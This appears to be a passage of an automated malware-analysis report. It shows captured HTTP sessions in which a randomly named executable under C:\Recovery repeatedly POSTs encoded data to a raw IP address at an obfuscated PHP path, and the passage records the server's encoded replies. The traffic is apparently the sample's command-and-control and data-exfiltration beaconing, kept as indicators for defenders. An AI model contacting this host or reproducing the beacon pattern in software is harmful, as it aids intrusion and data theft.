                                                                                                                                        Data Ascii: W^_Z_ETS[YQVY^X[V\]YZQ[F[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!@/!$ /(&/9=>9".)Y;%:+?V$$'$*0:'^& X/8
                                                                                                                                        Dec 21, 2024 10:10:13.228195906 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:13.461141109 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:13 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 26 04 35 25 09 55 27 2d 2b 1f 24 3d 2e 10 2b 10 0a 02 27 3c 39 44 20 33 23 05 29 11 01 10 30 00 26 15 30 3c 28 1e 3c 33 3f 5c 2d 0a 20 46 04 1c 23 58 2b 0d 35 09 2a 28 33 06 2d 3b 39 5f 29 32 3e 5a 21 3c 29 11 37 3e 35 07 23 21 36 0b 2b 17 2a 51 3d 27 20 59 2e 2d 22 5d 22 3a 23 56 0b 1f 3a 0a 2a 20 39 03 33 09 3f 07 32 0e 32 1d 23 26 37 50 35 54 3b 13 36 03 37 12 31 16 35 00 22 01 38 10 2a 06 3a 13 25 39 2f 0f 2c 2d 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98&5%U'-+$=.+'<9D 3#)0&0<(<3?\- F#X+5*(3-;9_)2>Z!<)7>5#!6+*Q=' Y.-"]":#V:* 93?22#&7P5T;6715"8*:%9/,-&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        129192.168.2.450138185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:12.099220991 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:12.452347994 CET1012OUTData Raw: 57 56 5f 5c 5f 49 51 56 5b 59 51 56 59 5b 58 58 56 5a 5d 58 5a 5f 5b 40 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WV_\_IQV[YQVY[XXVZ]XZ_[@[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"-1$Y72&_*=5#%)<+'(5Y(0#0"^3*'^& X/,
                                                                                                                                        Dec 21, 2024 10:10:13.342699051 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:13.577071905 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:13 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        130192.168.2.450139185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:13.817478895 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:10:14.171308041 CET1012OUTData Raw: 57 5e 5a 5a 5f 44 51 50 5b 59 51 56 59 58 58 50 56 58 5d 58 5a 5a 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: W^ZZ_DQP[YQVYXXPVX]XZZ[I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!A8" [2:*.:W".><$\%8:+/&=;'7=''^& X/
                                                                                                                                        Dec 21, 2024 10:10:15.071376085 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:15.309256077 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:14 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        131192.168.2.450140185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:15.556886911 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:15.906862974 CET1012OUTData Raw: 57 5f 5a 58 5a 47 51 57 5b 59 51 56 59 5f 58 59 56 5c 5d 5d 5a 5e 5b 43 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: W_ZXZGQW[YQVY_XYV\]]Z^[C[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!F;2^#$,-).2S7>>]>?,Z2((*7W'X''7*X''^& X/<
                                                                                                                                        Dec 21, 2024 10:10:16.802241087 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:17.041100979 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:16 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        132192.168.2.450141185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:17.285904884 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:17.640804052 CET1012OUTData Raw: 57 56 5f 5a 5f 47 51 50 5b 59 51 56 59 59 58 58 56 5f 5d 58 5a 51 5b 47 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WV_Z_GQP[YQVYYXXV_]XZQ[G[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"8 ^741,).U :[+/Y2+)(_+V0X<_$'%&*'^& X/$
                                                                                                                                        Dec 21, 2024 10:10:18.534904003 CET25INHTTP/1.1 100 Continue


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        133192.168.2.450142185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:18.589185953 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1880
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:18.936825037 CET1880OUTData Raw: 57 53 5f 5d 5f 43 54 55 5b 59 51 56 59 5a 58 5e 56 58 5d 5a 5a 5c 5b 45 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WS_]_CTU[YQVYZX^VX]ZZ\[E[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"8!$^#/;15=- >=8Z18(3R'>3=$:'^& X/0
                                                                                                                                        Dec 21, 2024 10:10:19.842557907 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:20.077302933 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:19 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 26 02 36 25 06 0e 31 3d 24 0f 27 07 25 03 3c 07 27 18 27 2f 25 42 23 23 3c 14 29 2c 24 04 25 2e 2d 01 24 02 09 0d 3c 1e 05 58 2e 20 20 46 04 1c 23 5d 2b 1d 25 08 2a 06 38 16 3b 3b 22 01 2b 31 26 5c 22 3c 07 5c 34 07 2a 5d 23 31 3a 09 3c 00 3d 0e 29 37 38 13 39 58 3a 58 21 10 23 56 0b 1f 3a 0e 2b 30 3e 59 24 09 3c 1b 31 19 2e 54 34 18 27 51 21 22 02 09 21 04 2b 59 27 2b 2a 12 21 28 2f 0e 28 3f 0f 01 31 00 30 1c 39 2d 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98&6%1=$'%<''/%B##<),$%.-$<X. F#]+%*8;;"+1&\"<\4*]#1:<=)789X:X!#V:+0>Y$<1.T4'Q!"!+Y'+*!(/(?109-&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        134192.168.2.450143185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:18.712845087 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1008
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:19.061937094 CET1008OUTData Raw: 57 56 5f 5e 5a 43 51 5e 5b 59 51 56 59 5a 58 59 56 5f 5d 59 5a 51 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WV_^ZCQ^[YQVYZXYV_]YZQ[H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!B8!842<6X>*V"-&_=8&(9Y):?T'+0"0'^& X/,
                                                                                                                                        Dec 21, 2024 10:10:19.959161043 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:20.193222046 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:19 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        135192.168.2.450144185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:20.437861919 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:10:20.796500921 CET1012OUTData Raw: 57 57 5f 59 5a 45 51 55 5b 59 51 56 59 53 58 58 56 5a 5d 5c 5a 5d 5b 40 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WW_YZEQU[YQVYSXXVZ]\Z][@[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!B-!? (&>^(=V >"Z)(]1^%Z()7$$X37*]0:'^& X/
                                                                                                                                        Dec 21, 2024 10:10:21.682683945 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:21.921137094 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:21 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        136192.168.2.450145185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:22.163795948 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:22.514970064 CET1012OUTData Raw: 57 57 5f 51 5f 46 54 53 5b 59 51 56 59 5c 58 58 56 52 5d 5b 5a 5c 5b 41 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WW_Q_FTS[YQVY\XXVR][Z\[A[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!G/(4<(&/))R7:+,(1;9\++&=$]$79$'^& X/0
                                                                                                                                        Dec 21, 2024 10:10:23.411614895 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:23.645170927 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:23 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        137192.168.2.450146185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:23.917617083 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:24.264980078 CET1012OUTData Raw: 52 52 5f 59 5a 44 51 5f 5b 59 51 56 59 52 58 5d 56 58 5d 57 5a 51 5b 47 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RR_YZDQ_[YQVYRX]VX]WZQ[G[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"/,]4,+Z&))=&U =6> 2;!Z<*+T$;$73'^& X/
                                                                                                                                        Dec 21, 2024 10:10:25.168272018 CET25INHTTP/1.1 100 Continue


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        138192.168.2.450147185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:25.214190006 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:25.562796116 CET1892OUTData Raw: 52 53 5f 5a 5f 49 54 54 5b 59 51 56 59 58 58 51 56 5b 5d 5d 5a 5b 5b 41 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RS_Z_ITT[YQVYXXQV[]]Z[[A[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!B,,\7%6[>[%"->=?&+'X<X&$*^&*'^& X/
                                                                                                                                        Dec 21, 2024 10:10:26.461956978 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:26.701308012 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:26 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 25 58 21 43 33 1e 27 2d 30 0c 25 3d 2d 05 28 10 23 5c 27 5a 32 19 34 1d 38 16 3d 3f 02 00 24 3d 2a 16 30 05 24 57 3e 30 37 10 2d 1a 20 46 04 1c 23 14 3c 23 2a 14 2a 16 30 5e 2c 3b 35 5f 2b 21 25 03 36 02 3e 04 23 58 29 04 22 31 3d 54 3c 3a 21 0a 29 34 01 02 39 00 3a 13 21 2a 23 56 0b 1f 39 52 29 1e 2d 02 30 19 3c 5d 26 27 2e 51 37 26 2f 1a 22 21 38 0d 22 03 3b 10 25 06 39 04 21 16 09 0a 28 2f 07 00 31 07 02 1d 2e 3d 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98%X!C3'-0%=-(#\'Z248=?$=*0$W>07- F#<#**0^,;5_+!%6>#X)"1=T<:!)49:!*#V9R)-0<]&'.Q7&/"!8";%9!(/1.=&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        139192.168.2.450148185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:25.334287882 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:25.687360048 CET1012OUTData Raw: 52 54 5f 5a 5f 42 51 54 5b 59 51 56 59 5c 58 5c 56 59 5d 57 5a 5a 5b 45 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RT_Z_BQT[YQVY\X\VY]WZZ[E[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"/ X 41>=6U &+?$18%]+*/V&.'"$'^& X/0
